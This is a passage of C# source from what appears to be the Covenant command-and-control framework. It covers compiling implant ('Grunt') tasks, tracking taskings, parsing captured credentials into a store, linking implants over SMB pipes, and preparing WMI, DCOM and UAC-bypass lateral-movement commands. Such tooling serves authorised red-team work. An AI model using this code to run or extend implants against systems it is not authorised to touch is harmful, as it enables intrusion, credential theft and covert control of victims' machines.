* var removeResources = updatingTask.EmbeddedResources.Select(MER => MER.Id).Except(task.EmbeddedResources.Select(ER => ER.Id));
* var addResources = task.EmbeddedResources.Select(MER => MER.Id).Except(updatingTask.EmbeddedResources.Select(MER => MER.Id));
* removeResources.ToList().ForEach(async RR => updatingTask.Remove(await this.GetEmbeddedResource(RR)));
* addResources.ToList().ForEach(async AR => updatingTask.Add(await this.GetEmbeddedResource(AR)));
*
* var removeLibraries = updatingTask.ReferenceSourceLibraries.Select(MRSL => MRSL.Id).Except(task.ReferenceSourceLibraries.Select(RSL => RSL.Id));
* var addLibraries = task.ReferenceSourceLibraries.Select(RSL => RSL.Id).Except(updatingTask.ReferenceSourceLibraries.Select(MRSL => MRSL.Id));
* removeLibraries.ToList().ForEach(async RL => updatingTask.Remove(await this.GetReferenceSourceLibrary(RL)));
* addLibraries.ToList().ForEach(async AL => updatingTask.Add(await this.GetReferenceSourceLibrary(AL)));
*
* GruntTaskAuthor author = await _context.GruntTaskAuthors.FirstOrDefaultAsync(A => A.Name == task.Author.Name);
* if (author != null)
* {
* updatingTask.AuthorId = author.Id;
* updatingTask.Author = author;
* }
* else
* {
* await _context.GruntTaskAuthors.AddAsync(task.Author);
* await _context.SaveChangesAsync();
* updatingTask.AuthorId = task.Author.Id;
* updatingTask.Author = task.Author;
* }
*
* _context.GruntTasks.Update(updatingTask);
* await _context.SaveChangesAsync();
*
* // _notifier.OnEditGruntTask(this, updatingTask);*/
return(null);
}
public byte[] CompileExe(GruntTask task, Common.DotNetVersion version, OutputKind outputKind, Boolean Compress)
{
byte[] ILBytes = null;
if (version == Common.DotNetVersion.Net35 || version == Common.DotNetVersion.Net40)
{
List <Compiler.Reference> references = null;
switch (version)
{
case Common.DotNetVersion.Net35:
references = Common.DefaultNet35References;
break;
case Common.DotNetVersion.Net40:
references = Common.DefaultNet40References;
break;
}
ILBytes = Compiler.Compile(new Compiler.CsharpFrameworkCompilationRequest
{
Language = task.Language,
Source = task.Code,
TargetDotNetVersion = version,
OutputKind = outputKind,
References = references
});
}
else if (version == Common.DotNetVersion.NetCore31)
{
string src = task.Code;
string sanitizedName = Utilities.GetSanitizedFilename(task.Name);
string dir = Common.CovenantDataDirectory + "Grunt" + Path.DirectorySeparatorChar + sanitizedName + Path.DirectorySeparatorChar;
string ResultName;
/*if (template.StagerCode == CodeTemplate)
* {
* ResultName = sanitizedName + "Stager";
* dir += sanitizedName + "Stager" + Path.DirectorySeparatorChar;
* string file = sanitizedName + "Stager" + Utilities.GetExtensionForLanguage(template.Language);
* File.WriteAllText(dir + file, src);
* }*/
if (true)
{
ResultName = sanitizedName;
dir += sanitizedName + Path.DirectorySeparatorChar;
string file = sanitizedName + Utilities.GetExtensionForLanguage(task.Language);
File.WriteAllText(dir + file, src);
}
ILBytes = Compiler.Compile(new Compiler.CsharpCoreCompilationRequest
{
ResultName = ResultName,
Language = task.Language,
TargetDotNetVersion = version,
SourceDirectory = dir,
OutputKind = outputKind,
//update this to not be hardcoded
RuntimeIdentifier = Compiler.RuntimeIdentifier.win_x64,
UseSubprocess = true
});
}
if (ILBytes == null || ILBytes.Length == 0)
{
throw new CovenantCompileGruntStagerFailedException("Compiling Grunt code failed");
}
if (Compress)
{
ILBytes = Utilities.Compress(ILBytes);
}
return(ILBytes);
}
public ActionResult <GruntTasking> EditGruntTasking(int id, int tid, [FromBody] GruntTasking gruntTasking)
{
Grunt grunt = _context.Grunts.FirstOrDefault(G => G.Id == id);
if (grunt == null)
{
return(NotFound($"NotFound - Grunt with id: {id}"));
}
GruntTasking updatingGruntTasking = _context.GruntTaskings.FirstOrDefault(GT => grunt.Id == GT.GruntId && tid == GT.Id);
if (updatingGruntTasking == null)
{
return(NotFound($"NotFound - GruntTasking with id: {tid}"));
}
GruntTask gruntTask = _context.GruntTasks.FirstOrDefault(G => G.Id == gruntTasking.TaskId);
if (gruntTask == null)
{
return(NotFound($"NotFound - GruntTask with id: {gruntTasking.TaskId}"));
}
GruntTask DownloadTask = _context.GruntTasks.FirstOrDefault(GT => GT.Name == "Download");
if (DownloadTask == null)
{
return(NotFound($"NotFound - GruntTask DownloadTask"));
}
List <CapturedCredential> capturedCredentials = CapturedCredential.ParseCredentials(gruntTasking.GruntTaskOutput);
foreach (CapturedCredential cred in capturedCredentials)
{
if (!ContextContainsCredentials(cred))
{
_context.Credentials.Add(cred);
_context.SaveChanges();
}
}
GruntTaskingStatus newStatus = gruntTasking.Status;
GruntTaskingStatus originalStatus = updatingGruntTasking.Status;
if ((originalStatus == GruntTaskingStatus.Tasked || originalStatus == GruntTaskingStatus.Progressed) &&
newStatus == GruntTaskingStatus.Completed)
{
if (gruntTasking.Type == GruntTaskingType.Kill)
{
grunt.Status = Grunt.GruntStatus.Killed;
}
else if (gruntTasking.Type == GruntTaskingType.SetDelay || gruntTasking.Type == GruntTaskingType.SetJitter || gruntTasking.Type == GruntTaskingType.SetConnectAttempts)
{
bool parsed = int.TryParse(gruntTasking.TaskingMessage, out int n);
if (parsed)
{
if (gruntTasking.Type == GruntTaskingType.SetDelay)
{
grunt.Delay = n;
}
else if (gruntTasking.Type == GruntTaskingType.SetJitter)
{
grunt.JitterPercent = n;
}
else if (gruntTasking.Type == GruntTaskingType.SetConnectAttempts)
{
grunt.ConnectAttempts = n;
}
}
}
else if (gruntTasking.Type == GruntTaskingType.Connect)
{
if (originalStatus == GruntTaskingStatus.Tasked)
{
// Check if this Grunt was already connected
string hostname = gruntTasking.GruntTaskingMessage.Message.Split(",")[0];
string pipename = gruntTasking.GruntTaskingMessage.Message.Split(",")[1];
Grunt previouslyConnectedGrunt = _context.Grunts.FirstOrDefault(G =>
G.CommType == Grunt.CommunicationType.SMB &&
(G.IPAddress == hostname || G.Hostname == hostname) &&
G.SMBPipeName == pipename &&
(G.Status == Grunt.GruntStatus.Disconnected || G.Status == Grunt.GruntStatus.Lost || G.Status == Grunt.GruntStatus.Active)
);
if (previouslyConnectedGrunt != null)
{
if (previouslyConnectedGrunt.Status != Grunt.GruntStatus.Disconnected)
{
// If already connected, disconnect to avoid cycles
Grunt previouslyConnectedGruntPrevParent = null;
foreach (Grunt g in _context.Grunts)
{
if (g.Children.Contains(previouslyConnectedGrunt.GUID))
{
previouslyConnectedGruntPrevParent = g;
}
}
if (previouslyConnectedGruntPrevParent != null)
{
previouslyConnectedGruntPrevParent.RemoveChild(previouslyConnectedGrunt);
_context.Grunts.Update(previouslyConnectedGruntPrevParent);
}
}
// Connect to tasked Grunt, no need to "Progress", as Grunt is already staged
grunt.AddChild(previouslyConnectedGrunt);
previouslyConnectedGrunt.Status = Grunt.GruntStatus.Active;
_context.Grunts.Update(previouslyConnectedGrunt);
}
else
{
// If not already connected, the Grunt is going to stage, set status to Progressed
newStatus = GruntTaskingStatus.Progressed;
}
}
else if (originalStatus == GruntTaskingStatus.Progressed)
{
// Connecting Grunt has staged, add as Child
string hostname = gruntTasking.GruntTaskingMessage.Message.Split(",")[0];
string pipename = gruntTasking.GruntTaskingMessage.Message.Split(",")[1];
Grunt stagingGrunt = _context.Grunts.FirstOrDefault(G =>
G.CommType == Grunt.CommunicationType.SMB &&
((G.IPAddress == hostname || G.Hostname == hostname) || (G.IPAddress == "" && G.Hostname == "")) &&
G.SMBPipeName == pipename &&
G.Status == Grunt.GruntStatus.Stage0
);
if (stagingGrunt == null)
{
return(NotFound($"NotFound - Grunt staging from {hostname}:{pipename}"));
}
grunt.AddChild(stagingGrunt);
}
}
else if (gruntTasking.Type == GruntTaskingType.Disconnect)
{
Grunt disconnectFromGrunt = _context.Grunts.FirstOrDefault(G => G.GUID == gruntTasking.GruntTaskingMessage.Message);
if (disconnectFromGrunt == null)
{
return(NotFound($"NotFound - Grunt with GUID: {gruntTasking.GruntTaskingMessage.Message}"));
}
disconnectFromGrunt.Status = Grunt.GruntStatus.Disconnected;
_context.Grunts.Update(disconnectFromGrunt);
grunt.RemoveChild(disconnectFromGrunt);
}
}
if ((newStatus == GruntTaskingStatus.Completed || newStatus == GruntTaskingStatus.Progressed) && originalStatus != newStatus)
{
if (newStatus == GruntTaskingStatus.Completed)
{
updatingGruntTasking.CompletionTime = DateTime.UtcNow;
}
string verb = newStatus == GruntTaskingStatus.Completed ? "completed" : "progressed";
if (gruntTasking.TaskId == DownloadTask.Id)
{
_context.Events.Add(new Event
{
Time = updatingGruntTasking.CompletionTime,
MessageHeader = "[" + updatingGruntTasking.CompletionTime + " UTC] Grunt: " + grunt.Name + " has " + verb + " GruntTasking: " + gruntTasking.Name,
Level = Event.EventLevel.Highlight,
Context = grunt.Name
});
string FileName = Common.CovenantEncoding.GetString(Convert.FromBase64String(gruntTasking.TaskingMessage.Split(",")[1]));
DownloadEvent downloadEvent = new DownloadEvent
{
Time = updatingGruntTasking.CompletionTime,
MessageHeader = "Downloaded: " + FileName + "\r\n" + "Syncing to Elite...",
Level = Event.EventLevel.Highlight,
Context = grunt.Name,
FileName = FileName,
FileContents = gruntTasking.GruntTaskOutput,
Progress = DownloadEvent.DownloadProgress.Complete
};
downloadEvent.WriteToDisk();
_context.Events.Add(downloadEvent);
}
else
{
_context.Events.Add(new Event
{
Time = updatingGruntTasking.CompletionTime,
MessageHeader = "[" + updatingGruntTasking.CompletionTime + " UTC] Grunt: " + grunt.Name + " has " + verb + " GruntTasking: " + gruntTasking.Name,
MessageBody = "(" + gruntTasking.TaskingUser + ") > " + gruntTasking.TaskingCommand + Environment.NewLine + gruntTasking.GruntTaskOutput,
Level = Event.EventLevel.Highlight,
Context = grunt.Name
});
}
}
updatingGruntTasking.Status = newStatus;
updatingGruntTasking.GruntTaskOutput = gruntTasking.GruntTaskOutput;
_context.GruntTaskings.Update(updatingGruntTasking);
_context.Grunts.Update(grunt);
_context.SaveChanges();
return(updatingGruntTasking);
}
//Use this for starting the server
public static void StartServer(EmpireService service)
{
DbInitializer.Initialize(service);
List <GruntTask> tsks = service.GetEmpire().gruntTasks;
//arbitrary buffer size. This may need to change in the future
byte[] buffer = new byte[10000000];
IPEndPoint localEndPoint = new IPEndPoint(IPAddress.Parse("127.0.0.1"), 2012);
Socket listener = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
listener.Bind(localEndPoint);
listener.Listen(100);
while (true)
{
Console.WriteLine("Compiler ready");
Socket socket = listener.Accept();
int bytesRec = socket.Receive(buffer);
//interpret the message
var data = Encoding.ASCII.GetString(buffer, 0, bytesRec);
string[] recMessage = data.Split(",");
//Data is sent with the TaskName first and then
var bytesTaskName = Convert.FromBase64String(recMessage[0]);
var bytesYAML = Convert.FromBase64String(recMessage[1]);
string strTaskName = Encoding.UTF8.GetString(bytesTaskName);
string strYAML = Encoding.UTF8.GetString(bytesYAML);
// Initialize the task from the passed YAML
DbInitializer.IngestTask(service, strYAML);
tsks = service.GetEmpire().gruntTasks;
try
{
if (strTaskName != "close")
{
GruntTask tsk = tsks.First(tk => tk.Name == strTaskName);
var chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
var stringChars = new char[5];
var random = new Random();
for (int i = 0; i < stringChars.Length; i++)
{
stringChars[i] = chars[random.Next(chars.Length)];
}
var randNew = new String(stringChars);
tsk.Name = tsk.Name + "_" + randNew;
tsk.Compile();
string message = "FileName:" + tsk.Name;
var msgBytes = Encoding.ASCII.GetBytes(message);
socket.Send(msgBytes);
}
else
{
socket.Close();
break;
}
}
catch (Exception e)
{
string message = "Compile failed";
var msgBytes = Encoding.ASCII.GetBytes(message);
socket.Send(msgBytes);
Console.WriteLine(e.ToString());
}
}
}
public async Task <ActionResult <GruntTask> > CreateGruntTask([FromBody] GruntTask task)
{
GruntTask savedTask = await _context.CreateGruntTask(task);
return(CreatedAtRoute(nameof(GetGruntTask), new { id = savedTask.Id }, savedTask));
}
public ActionResult <GruntTasking> CreateGruntTasking(int id, [FromBody] GruntTasking gruntTasking)
{
Grunt grunt = _context.Grunts.FirstOrDefault(G => G.Id == id);
if (grunt == null)
{
return(NotFound());
}
if (gruntTasking.type == GruntTasking.GruntTaskingType.Assembly)
{
GruntTask task = _context.GruntTasks.FirstOrDefault(T => T.Id == gruntTasking.TaskId);
if (task == null)
{
return(NotFound());
}
task.Options = _context.GruntTaskOptions.Where(O => O.TaskId == task.Id).ToList();
List <string> parameters = task.Options.OrderBy(O => O.OptionId).Select(O => O.Value).ToList();
if (task.Name.ToLower() == "wmi")
{
Launcher l = _context.Launchers.FirstOrDefault(L => L.Name.ToLower() == parameters[3].ToLower());
if ((parameters[4] != null && parameters[4] != "") || l == null || l.LauncherString == null || l.LauncherString.Trim() == "")
{
// If using custom command
// Remove the "Launcher" parameter
parameters.RemoveAt(3);
}
else
{
// If using Launcher
// Remove the "Command" parameter
parameters.RemoveAt(4);
// Set LauncherString to WMI command parameter
parameters[3] = l.LauncherString;
}
}
else if (task.Name.ToLower() == "dcom")
{
Launcher l = _context.Launchers.FirstOrDefault(L => L.Name.ToLower() == parameters[1].ToLower());
if ((parameters[2] != null && parameters[2] != "") || l == null || l.LauncherString == null || l.LauncherString.Trim() == "")
{
// If using custom command
// Remove the "Launcher" parameter
parameters.RemoveAt(1);
// Add .exe exetension if needed
List <string> split = parameters[1].Split(" ").ToList();
parameters[1] = split[0];
if (!parameters[1].EndsWith(".exe"))
{
parameters[1] += ".exe";
}
split.RemoveAt(0);
parameters.Insert(2, String.Join(" ", split.ToArray()));
string Directory = "C:\\WINDOWS\\System32\\";
if (parameters[1].ToLower().Contains("powershell.exe"))
{
Directory += "WindowsPowerShell\\v1.0\\";
}
else if (parameters[1].ToLower().Contains("wmic.exe"))
{
Directory += "wbem\\";
}
parameters.Insert(3, Directory);
}
else
{
// If using Launcher
// Remove the "Command" parameter
parameters.RemoveAt(2);
// Set LauncherString to DCOM command parameter
parameters[1] = l.LauncherString;
// Add .exe exetension if needed
List <string> split = parameters[1].Split(" ").ToList();
parameters[1] = split[0];
if (!parameters[1].EndsWith(".exe"))
{
parameters[1] += ".exe";
}
split.RemoveAt(0);
parameters.Insert(2, String.Join(" ", split.ToArray()));
string Directory = "C:\\WINDOWS\\System32\\";
if (parameters[1].ToLower().Contains("powershell.exe"))
{
Directory += "WindowsPowerShell\\v1.0\\";
}
else if (parameters[1].ToLower().Contains("wmic.exe"))
{
Directory += "wbem\\";
}
parameters.Insert(3, Directory);
}
}
else if (task.Name.ToLower() == "bypassuac")
{
Launcher l = _context.Launchers.FirstOrDefault(L => L.Name.ToLower() == parameters[0].ToLower());
if ((parameters[1] != null && parameters[1] != "") || l == null || l.LauncherString == null || l.LauncherString.Trim() == "")
{
// If using custom command
// Remove the "Launcher" parameter
parameters.RemoveAt(0);
// Add .exe exetension if needed
string[] split = parameters[0].Split(" ");
parameters[0] = split.FirstOrDefault();
if (!parameters[0].EndsWith(".exe"))
{
parameters[0] += ".exe";
}
// Add parameters needed for BypassUAC Task
parameters.Add(String.Join(" ", split.ToList().GetRange(1, split.Count() - 1)));
parameters.Add("C:\\WINDOWS\\System32\\");
if (parameters[0].ToLower().Contains("powershell.exe"))
{
parameters[2] += "WindowsPowerShell\\v1.0\\";
}
else if (parameters[0].ToLower().Contains("wmic.exe"))
{
parameters[2] += "wbem\\";
}
parameters.Add("0");
}
else
{
// If using Launcher
// Remove the "Command" parameter
parameters.RemoveAt(1);
// Add .exe exetension if needed
string[] split = l.LauncherString.Split(" ");
parameters[0] = split.FirstOrDefault();
if (!parameters[0].EndsWith(".exe"))
{
parameters[0] += ".exe";
}
// Add parameters need for BypassUAC Task
parameters.Add(String.Join(" ", split.ToList().GetRange(1, split.Count() - 1)));
parameters.Add("C:\\WINDOWS\\System32\\");
if (l.Name.ToLower() == "powershell")
{
parameters[2] += "WindowsPowerShell\\v1.0\\";
}
else if (l.Name.ToLower() == "wmic")
{
parameters[2] += "wbem\\";
}
parameters.Add("0");
}
}
try
{
gruntTasking.Compile(
task.Code, parameters,
task.GetReferenceAssemblies(),
task.GetReferenceSourceLibraries(),
task.GetEmbeddedResources(),
grunt.DotNetFrameworkVersion
);
}
catch (Exception e)
{
Console.Error.WriteLine("Task Compilation failed: " + e.Message + e.StackTrace);
return(BadRequest("Task returned compilation errors:" + e.Message + e.StackTrace));
}
}
_context.GruntTaskings.Add(gruntTasking);
_context.SaveChanges();
return(CreatedAtRoute(nameof(GetGruntTasking), new { id = id, taskname = gruntTasking.Name }, gruntTasking));
}
public async Task <string> ParseParametersIntoTask(GruntTask task, List <ParsedParameter> parameters)
{
return(null);
}
public async Task <string> Set(Grunt grunt, GruntCommand command, List <ParsedParameter> parameters)
{
if (parameters.Count != 3)
{
return(EliteConsole.PrintFormattedErrorLine("Usage: Set (Delay | JitterPercent | ConnectAttempts) <value>"));
}
if (int.TryParse(parameters[2].Value, out int n))
{
GruntTask setTask = await _context.GetGruntTaskByName("Set");
if (parameters[1].Value.Equals("delay", StringComparison.OrdinalIgnoreCase))
{
grunt.Delay = n;
await _context.CreateGruntTasking(new GruntTasking
{
Id = 0,
GruntId = grunt.Id,
Grunt = grunt,
GruntTaskId = setTask.Id,
GruntTask = setTask,
Status = GruntTaskingStatus.Uninitialized,
Type = GruntTaskingType.SetDelay,
Parameters = new List <string> {
grunt.Delay.ToString()
},
GruntCommand = command,
GruntCommandId = command.Id
}, _grunthub);
}
else if (parameters[1].Value.Equals("jitterpercent", StringComparison.OrdinalIgnoreCase))
{
grunt.JitterPercent = n;
await _context.CreateGruntTasking(new GruntTasking
{
Id = 0,
GruntId = grunt.Id,
Grunt = grunt,
GruntTaskId = setTask.Id,
GruntTask = setTask,
Status = GruntTaskingStatus.Uninitialized,
Type = GruntTaskingType.SetJitter,
Parameters = new List <string> {
grunt.JitterPercent.ToString()
},
GruntCommand = command,
GruntCommandId = command.Id
}, _grunthub);
}
else if (parameters[1].Value.Equals("connectattempts", StringComparison.OrdinalIgnoreCase))
{
grunt.ConnectAttempts = n;
await _context.CreateGruntTasking(new GruntTasking
{
Id = 0,
GruntId = grunt.Id,
Grunt = grunt,
GruntTaskId = setTask.Id,
GruntTask = setTask,
Status = GruntTaskingStatus.Uninitialized,
Type = GruntTaskingType.SetConnectAttempts,
Parameters = new List <string> {
grunt.ConnectAttempts.ToString()
},
GruntCommand = command,
GruntCommandId = command.Id
}, _grunthub);
}
return("");
}
return(EliteConsole.PrintFormattedErrorLine("Usage: Set (Delay | JitterPercent | ConnectAttempts) <value>"));
}
private static MenuCommand GetTaskMenuSetCommand(GruntTask task, CovenantAPI CovenantClient)
{
List <MenuCommandParameterValue> DefaultOptions = task.Options.Select(O => new MenuCommandParameterValue {
Value = O.Name
}).ToList();
switch (task.Name)
{
case "Assembly":
return(new MenuCommandAssemblyTaskSet(CovenantClient)
{
Name = "Set",
Description = "Set AssemblyTask option",
Parameters = new List <MenuCommandParameter> {
new MenuCommandParameter {
Name = "Option",
Values = DefaultOptions.Append(
new MenuCommandParameterValue {
Value = "AssemblyPath",
NextValueSuggestions = Utilities.GetFilesForPath(Common.EliteDataFolder)
}
).ToList()
},
new MenuCommandParameter {
Name = "Value"
}
}
});
case "Upload":
return(new MenuCommandUploadTaskSet(CovenantClient)
{
Name = "Set",
Description = "Set Upload option",
Parameters = new List <MenuCommandParameter> {
new MenuCommandParameter {
Name = "Option",
Values = DefaultOptions.Append(
new MenuCommandParameterValue {
Value = "FilePath",
NextValueSuggestions = Utilities.GetFilesForPath(Common.EliteDataFolder)
}
).ToList()
},
new MenuCommandParameter {
Name = "Value"
}
}
});
case "ShellCode":
return(new MenuCommandShellCodeTaskSet(CovenantClient)
{
Name = "Set",
Description = "Set ShellCode option",
Parameters = new List <MenuCommandParameter> {
new MenuCommandParameter {
Name = "Option",
Values = DefaultOptions.Append(
new MenuCommandParameterValue {
Value = "ShellcodeBinFilePath",
NextValueSuggestions = Utilities.GetFilesForPath(Common.EliteDataFolder)
}
).ToList()
},
new MenuCommandParameter {
Name = "Value"
}
}
});
default:
return(new MenuCommandTaskSet(CovenantClient)
{
Name = "Set",
Description = "Set " + task.Name + " option",
Parameters = new List <MenuCommandParameter> {
new MenuCommandParameter {
Name = "Option", Values = DefaultOptions
},
new MenuCommandParameter {
Name = "Value"
}
}
});
}
}
